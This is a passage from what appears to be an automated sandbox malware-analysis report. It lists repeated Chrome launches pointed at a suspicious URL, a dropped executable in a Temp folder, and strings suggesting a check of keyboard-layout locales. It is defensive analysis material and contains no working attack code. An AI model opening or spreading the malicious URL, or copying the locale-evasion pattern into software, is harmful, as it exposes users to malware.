File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	131
Start time:	01:33:52
Start date:	07/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	132
Start time:	01:33:52
Start date:	07/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=2000,i,12795265570595023803,2009076803051335294,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	133
Start time:	01:33:53
Start date:	07/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2036 --field-trial-handle=1972,i,10677569344053674716,7012595910923912148,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	134
Start time:	01:33:53
Start date:	07/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	135
Start time:	01:33:54
Start date:	07/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	136
Start time:	01:33:54
Start date:	07/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2068 --field-trial-handle=2016,i,6451084168294191247,3303557760454261359,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	137
Start time:	01:33:55
Start date:	07/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2036 --field-trial-handle=1980,i,1857441977012259282,17901089399641908308,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	138
Start time:	01:33:55
Start date:	07/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	139
Start time:	01:33:55
Start date:	07/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	140
Start time:	01:33:55
Start date:	07/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	141
Start time:	01:33:56
Start date:	07/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1884 --field-trial-handle=1992,i,13675614276573810495,14474061813535694310,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	142
Start time:	01:33:56
Start date:	07/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2028 --field-trial-handle=1968,i,7487110070847316896,5582251863534710150,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	143
Start time:	01:33:57
Start date:	07/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1168 --field-trial-handle=2028,i,13790200691533269936,14390321029282639858,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	144
Start time:	01:33:58
Start date:	07/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	145
Start time:	01:33:58
Start date:	07/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	146
Start time:	01:33:58
Start date:	07/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	147
Start time:	01:33:58
Start date:	07/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2020 --field-trial-handle=2044,i,12705238517774536685,12117524317393481054,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	148
Start time:	01:33:59
Start date:	07/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2068 --field-trial-handle=2008,i,418568306607350609,5560649611066257662,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	149
Start time:	01:33:59
Start date:	07/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	150
Start time:	01:33:59
Start date:	07/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	151
Start time:	01:34:01
Start date:	07/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1468 --field-trial-handle=1744,i,11295412607946737316,9054402318779687979,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	152
Start time:	01:34:03
Start date:	07/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=2012,i,17020493693857119135,5398933278766730022,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	153
Start time:	01:34:03
Start date:	07/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2196 --field-trial-handle=2064,i,3078106045737069916,8196321467453170590,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	154
Start time:	01:34:03
Start date:	07/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	155
Start time:	01:34:03
Start date:	07/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	156
Start time:	01:34:04
Start date:	07/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2100 --field-trial-handle=2012,i,15081096063514957223,8890955275309698934,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	157
Start time:	01:34:04
Start date:	07/11/2024
Path:	C:\Users\user\AppData\Local\Temp\1004553001\4477947f1f.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1004553001\4477947f1f.exe"
Imagebase:	0xd10000
File size:	2'755'072 bytes
MD5 hash:	ACC11F67CF4889111898285909FFAC31
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	158
Start time:	01:34:05
Start date:	07/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	159
Start time:	01:34:05
Start date:	07/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	3.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	4.9%
Total number of Nodes:	755
Total number of Limit Nodes:	16

Executed Functions

Function 0030652B Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

APIs

ExitProcess.KERNEL32(?,?,0030652A,?,?,?,?,?,00307661), ref: 00306567

Memory Dump Source

Source File: 00000000.00000002.1696962631.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1696928589.00000000002D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696962631.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697483923.0000000000339000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697575753.000000000033B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698107466.0000000000345000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698145968.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698168842.0000000000347000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698394305.000000000049A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698414003.000000000049D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698530610.00000000004B0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698530610.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698578576.00000000004C0000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698993165.00000000004C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011760.00000000004C6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699032395.00000000004C7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699117800.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699138916.00000000004F6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699321096.00000000004F7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699375451.00000000004FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699403454.0000000000515000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699595666.0000000000517000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699639765.0000000000518000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699655740.000000000051D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699692138.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699709413.0000000000524000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699726186.000000000052C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699739671.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699753606.0000000000537000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699767147.000000000053B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699782980.000000000053C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699800362.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699815824.0000000000549000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699830156.000000000054A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699843835.000000000054B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699858423.0000000000553000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699875940.0000000000565000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699890391.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699917003.0000000000570000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699930565.0000000000571000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699930565.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699969682.00000000005A6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699983927.00000000005A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1700000371.00000000005C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1700014015.00000000005C1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1700028129.00000000005C6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1700041553.00000000005C8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1700056335.00000000005D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1700069523.00000000005D6000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_lIocM276SA.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 37d7a3eba443c8f4a81691d2fb3ba3940e14e146500e98bd0db5adfca74806a8
Instruction ID: 95e1dca743d92cf472f060583206355c48e78dab66103b0652bcfac35563a4b6
Opcode Fuzzy Hash: 37d7a3eba443c8f4a81691d2fb3ba3940e14e146500e98bd0db5adfca74806a8
Instruction Fuzzy Hash: 85E08630142108AECF377B18CC3ED893B69EF53745F014804F8554A569CB25ED51C5D0

Function 04DF0C09 Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1701378341.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4df0000_lIocM276SA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c92d4b2ea0a00e1a73092e9832d5677d09aa3620aa8274aa5642b1e2f175ee84
Instruction ID: f58514dad11dd36d5004a73b255c4dcb4cafdbe45f26d24e01ea3837683a13a1
Opcode Fuzzy Hash: c92d4b2ea0a00e1a73092e9832d5677d09aa3620aa8274aa5642b1e2f175ee84
Instruction Fuzzy Hash: B61131B630F215FEA233A9415F50ABA3629F282330333C426F6C78B803F244F64A7061

Function 002D5C10 Relevance: 12.7, APIs: 2, Strings: 5, Instructions: 434
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

00000422, xrefs: 002D60C9
Keyboard Layout\Preload, xrefs: 002D6054
0000043f, xrefs: 002D612B
00000419, xrefs: 002D6098
00000423, xrefs: 002D60FA

Memory Dump Source

Source File: 00000000.00000002.1696962631.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1696928589.00000000002D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696962631.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697483923.0000000000339000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697575753.000000000033B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698107466.0000000000345000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698145968.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698168842.0000000000347000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698394305.000000000049A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698414003.000000000049D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698530610.00000000004B0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698530610.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698578576.00000000004C0000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698993165.00000000004C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011760.00000000004C6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699032395.00000000004C7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699117800.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699138916.00000000004F6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699321096.00000000004F7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699375451.00000000004FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699403454.0000000000515000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699595666.0000000000517000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699639765.0000000000518000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699655740.000000000051D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699692138.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699709413.0000000000524000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699726186.000000000052C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699739671.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699753606.0000000000537000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699767147.000000000053B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699782980.000000000053C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699800362.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699815824.0000000000549000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699830156.000000000054A000.00000040.00000001.01000000.00000003.sdmpDownload File
